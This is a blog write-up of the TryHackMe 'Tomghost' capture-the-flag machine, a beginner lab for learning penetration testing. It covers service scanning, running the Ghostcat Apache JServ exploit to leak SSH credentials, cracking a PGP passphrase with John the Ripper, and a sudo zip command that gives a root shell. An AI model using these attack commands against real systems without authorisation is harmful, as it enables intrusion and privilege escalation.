TryHackMe Tomghost-Writeup

clock-img 21 Oct, 2021 
cat-img TryHackMe Writeups

TryHackMe Tomghost-Writeup

Tomghost is a beginner level machine from tryhackme. The machine is focused on teaching about the famous Apache Jserv exploit Ghostcat. We use Ghostcat LFI exploit to gather ssh credentials and gain access to the machine. The machines also has some pgp encryption files for us to crack and the final root access is gained by exploit misconfigured sudo privileges on the zip binary

TryHackMe Tomghost-Writeup

Connecting to HTB Vpn:

1. First download the vpn file from the access page of tryhackme

2. Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4. You can access the machine at the given ip


1. First let’s do a nmap scan on our target at

nmap -sV -A -p-

-sV : to get the service versions on each port

-A : to get information such as os details,traceroutes,ports etc

-p- : to scan all 65535 ports

–script vuln : to check for most common vulnerabilities

We get the following details from our scan


Certified Ethical Hacking


2. There is an open port with Apache Jserv running and i know a famous exploit for this service called Ghostcat

So whenever you see an Apache Jserv port open try this exploit

searchsploit ghostcat

TryHackMe Tomghost

3. Let’s download the exploit to our machine

searchsploit -m 48143

4. Now run the exploit with the IP address of the machine and we got some credentials

python -p 8009

Tomghost Walkthrough

Gaining Access:

5. Let’s try these credentials in ssh

ssh skyfuck@


6. There are two files present, so let’s transfer these two files using scp

scp skyfuck@* .

Tomghost TryHackMe

7. So this a pgp private key and public key, use these commands to decrypt this

gpg2john tryhackme.asc > new

john –wordlist=/usr/share/wordlists/rockyou.txt new

john –show new

Tomghost machine

So we got a passphrase, now lets decrypt the pgp file

gpg –import tryhackme.asc
gpg –decrypt credential.pgp

And enter the passphrase we got earlier

Tryhackme openPGP

8. So now we got credentials for the user merlin. Let’s login via ssh

ssh merlin@

Privilege Escalation:

9. Let’s check what all sudo privileges does the user merlin is allowed

sudo -l

TryHackMe Tomghost-Writeup

10. It says we can run zip as the root user, so lets use GTFOBins to exploit this

Enter the following command to get root shell

TF=$(mktemp -u)

sudo zip $TF /etc/hosts -T -TT ‘sh #’

sudo rm $TF

TryHackMe Tomghost Writeup

Don’t forget to check out our latest Blogs – TryHackMe Simple CTF-Writeup


Training Calender